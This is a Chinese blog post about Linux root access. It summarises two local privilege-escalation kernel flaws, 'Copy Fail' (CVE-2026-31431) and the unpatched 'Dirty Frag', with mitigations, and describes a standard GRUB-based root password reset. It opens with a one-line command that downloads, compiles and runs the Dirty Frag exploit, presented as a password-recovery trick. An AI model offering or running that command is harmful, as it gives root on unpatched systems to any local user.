- C24zhouyanchen's blog
linux
- @ 2026-5-12 14:38:54
Linux 密码找回教程(新):
- git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
- passwd root
- 设置你的新密码
截至 2026 年 5 月 12 日,Linux 最受关注的 root 级漏洞有两个:CVE-2026-31431(Copy Fail)与Dirty Frag(未分配 CVE),均为本地提权,可一键 root,影响极广。 一、CVE-2026-31431(Copy Fail)
公开时间:2026-04-29;风险等级:高危(CVSS 7.8) 成因:内核加密子系统(algif_aead/authencesn)逻辑缺陷,2017 年引入。 利用:普通用户→732 字节 Python 脚本→root;利用稳定、无需竞争条件。 影响:2017 年后主流发行版(Ubuntu、RHEL、Debian、SUSE、Amazon Linux 等),覆盖云主机、容器、K8s,可容器逃逸。 修复:内核≥6.18.22;临时防护:rmmod algif_aead(卸载加密模块)。
二、Dirty Frag(未分配 CVE)
公开时间:2026-05-09;状态:0day(无官方补丁)。 成因:组合 xfrm-ESP 与 RxRPC 页缓存写漏洞,属于 Dirty Pipe/Copy Fail 同类变种。 利用:本地普通用户→单程序执行→root;确定性漏洞、成功率 100%、不崩溃内核。 影响:2017 年起几乎所有 Linux 内核,含最新发行版。 修复:暂无官方补丁;临时防护:限制本地用户、禁用不必要的网络 / 加密组件。
三、核心对比 表格漏洞CVE补丁利用难度影响范围Copy Fail2026-31431已发布(6.18.22+)极低(一键脚本)2017 年后主流发行版Dirty Frag未分配无(0day)极低(单程序)同 Copy Fail,含最新版 四、应急建议
升级内核:优先更新至 6.18.22 + 或发行版最新安全补丁。 临时防护:卸载algif_aead模块;强化本地访问控制,限制低权限用户。 监控与检测:关注本地提权行为、异常页缓存修改,及时发现利用尝试。
Ubuntu 忘记 root 密码,正规重置步骤,不用任何漏洞,跟着一步步做就行 前提 必须能接触服务器控制台 / 虚拟机屏幕,远程 SSH 不行。 第一步 进入 GRUB 引导界面 重启 Ubuntu 机器 开机立刻按住 Shift 键不放,调出 GRUB 菜单 第二步 进入启动项编辑 选中正常的 Ubuntu 内核,按 e 进入编辑模式 第三步 修改启动参数 往下找到以 linux 开头的那一大行: 把该行里的 ro 改成 rw 把这行最后面的 quiet splash 删掉 在该行末尾加上: plaintext init=/bin/bash 改完样子大概:... rw init=/bin/bash 第四步 进入单用户 Shell 直接按 Ctrl + x 会进入一个 root 命令行,不用输密码直接最高权限 第五步 重置 root 密码 输入: bash 运行 passwd root 然后输入新密码,输两遍(屏幕不显示字符,正常输就行) 第六步 重启正常进系统 输入: bash 运行 exec /sbin/init 系统会正常启动,之后就可以用你刚设的密码登录 root 了。 补充:如果只想改普通用户密码 你平时登录的用户名比如叫 ubuntu,就用: bash 运行 passwd ubuntu